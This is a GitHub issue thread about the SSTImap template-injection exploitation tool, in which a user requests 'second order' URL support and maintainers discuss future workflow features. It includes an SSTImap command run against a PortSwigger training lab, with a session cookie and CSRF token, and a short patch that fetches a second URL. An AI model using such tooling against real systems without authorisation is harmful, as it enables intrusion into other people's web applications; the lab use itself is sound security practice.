SSTImap icon indicating copy to clipboard operation
SSTImap copied to clipboard
verified publisher icon vladko312

No second order support.

Open sectroyer opened this issue 2 years ago • 4 comments

I will use PortSwigger's "Basic server-side template injection (code context)" task as an example but I have encountered same issue elsewhere.

Currently there is no way to specify a second order url however it's pretty simple to implement. I didn't add specific switch but in code I just had add two lines. I used this command line: ./sstimap.py -u "https://0a70002e03773a3d81129428007b00eb.web-security-academy.net/my-account/change-blog-post-author-display" -d "blog-post-author-display=user.first_name&csrf=xGbHC88kaLt5KmNUTq7zw3wZ3fMDDAGx" --cookie 'session=Sk45UsfrkQRg3siVdnHxV8uBhDFG20gJ' -A -e Tornado

And changed those lines:

        second_order_url="https://0a70002e03773a3d81129428007b00eb.web-security-academy.net/post?postId=6"
        try:
            result = requests.request(method=self.http_method, url=url_params, params=get_params, data=post_params,
                                      headers=header_params, proxies=self.proxies, verify=self.args.get('verify_ssl'), allow_redirects=False).text
            result = requests.get(second_order_url,cookies=cookies,proxies=self.proxies,verify=False).text

simple if that checks if second_order_url is in self.args should suffice IMHO.

sectroyer avatar May 15 '23 19:05 sectroyer

This is a great idea! I will add this feature soon.

vladko312 avatar May 16 '23 04:05 vladko312

There are other cases that need a deeper fix:

  • Second order based on returned data (ID of the created post)
  • Reset required after every attempt (deleting a comment to fix HTTP error 500)
  • Reset based on data
  • Reset or second order not being HTTP (email, websockets, ...)

Some of this cases need some extra parameters that are unlikely to be used outside of them. I decided to move requesting functionality to a separate module in the future with a way to add custom parameters for that module.

For now, I don't have a lot of time, so this functionality will appear later.

vladko312 avatar May 26 '23 19:05 vladko312

Hi there! Any update regarding the second order feature? I started thinking of how to implement this, so feel free to share if you already have something in mind or some prototype.

Molx32 avatar Jan 03 '24 23:01 Molx32

@Molx32 I have some plans to add a way to do complex workflows with any amount of requests and a possibility for second order. This would also cover cases where you need to obtain a new session or remove your payloads to recover functionality on a vulnerable page.

vladko312 avatar Jan 03 '24 23:01 vladko312